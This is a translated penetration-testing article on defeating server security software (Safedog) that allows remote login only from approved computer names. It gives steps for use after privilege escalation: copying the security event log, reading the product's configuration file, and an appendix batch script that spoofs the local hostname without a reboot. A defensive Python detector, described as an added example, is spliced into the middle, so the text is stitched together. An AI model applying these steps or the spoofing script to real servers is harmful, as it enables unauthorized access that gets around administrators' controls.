Bypassing server security software that restricts remote login by computer name
Problem
Some server security software lets administrators specify the names of the computers that are allowed to log on (that is, the name of the administrator's own computer). If the computer that logs on does not have the administrator's computer name, the server security software intercepts the login. At first glance this method looks quite safe, but it only stops unsophisticated intruders.
Solution
1. After escalating your privileges, obtain the logon records of the remote server to learn the administrator's computer name.
copy C:\WINDOWS\system32\config\Secevent.evt c:\windows\temp\Secevent.evt
After downloading the file, open it in Notepad and search for: r d p-T c p
I have also included a script (see the appendix) that changes the name of your local computer without restarting it, so that you can complete the penetration smoothly and are not left having gone to the trouble of forwarding an intranet port only to need a restart to change the computer name. :)
2. Reasoning backwards: to verify the name, the server security software has to store the administrator's computer name somewhere. We can therefore search the configuration files of the server security software to obtain the administrator's computer name.
For example, the Safedog configuration file:
C:\Program Files\SafedogServer\SafeDogGuardCenter\ProGuardData.ini
If the data obtained is encrypted, we can install the same server security software locally and use it to decrypt the data. You get the idea.
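Both approaches work because the restriction trusts a name that the connecting client reports about itself, so a defender should bind each approved name to something the client does not choose, such as the source address. The following is an added example (not from the original article or from any vendor's code) that flags suspicious logons in constructed sample records; the line format, field names, `ALLOWED` policy and addresses are assumptions.

```python
import re
from collections import defaultdict

# Assumed policy: each approved admin workstation name is bound to known source addresses.
ALLOWED = {"ADMIN-PC01": {"10.0.5.21"}}

# Constructed sample records (not real logs), shaped like exported remote-logon events.
SAMPLE = """\
2024-03-01T09:02:11 user=administrator workstation=ADMIN-PC01 src=10.0.5.21
2024-03-01T23:47:53 user=administrator workstation=WIN-7F3K2 src=203.0.113.45
2024-03-01T23:52:10 user=administrator workstation=ADMIN-PC01 src=203.0.113.45
"""

LINE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) workstation=(?P<ws>\S+) src=(?P<src>\S+)$"
)

def parse(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield m.groupdict()

def find_name_spoofing(text, allowed=ALLOWED):
    """Return (timestamp, reason, workstation, src) tuples for suspicious logons."""
    findings = []
    names_by_src = defaultdict(set)  # workstation names each address has presented
    for ev in parse(text):
        ws, src = ev["ws"].upper(), ev["src"]
        # An approved name arriving from an address it is not bound to.
        if ws in allowed and src not in allowed[ws]:
            findings.append((ev["ts"], "approved-name-from-unbound-address", ws, src))
        # The same address presenting a different name than it used before.
        if names_by_src[src] and ws not in names_by_src[src]:
            findings.append((ev["ts"], "address-changed-workstation-name", ws, src))
        names_by_src[src].add(ws)
    return findings

if __name__ == "__main__":
    for finding in find_name_spoofing(SAMPLE):
        print(*finding)
```

The same binding can be enforced rather than only detected by restricting remote login to the bound source addresses at the firewall, so that the client-reported name is never the sole check.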
Appendix: script for modifying the computer name without restarting
@echo off
echo AppLife.net
set /p name=enter your computer name:
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName" /v ComputerName /t reg_sz /d %name% /f >nul 2>nul
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters" /v "NV Hostname" /t reg_sz /d %name% /f >nul 2>nul
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters" /v Hostname /t reg_sz /d %name% /f >nul 2>nul
echo.
echo.
echo AppLife.net
set /p work1=enter your workgroup Name:
wmic computersystem where Name="%COMPUTERNAME%" call JoinDomainOrWorkgroup Name="%work1%"
echo:
pause >nul
echo.
91ri.org note: the two ideas in this article are old ideas. In practice, you may find that they are no longer valid, but penetration is flexible and diverse, and you may be able to develop better skills based on the above ideas. We hope this prompts better ideas from you :P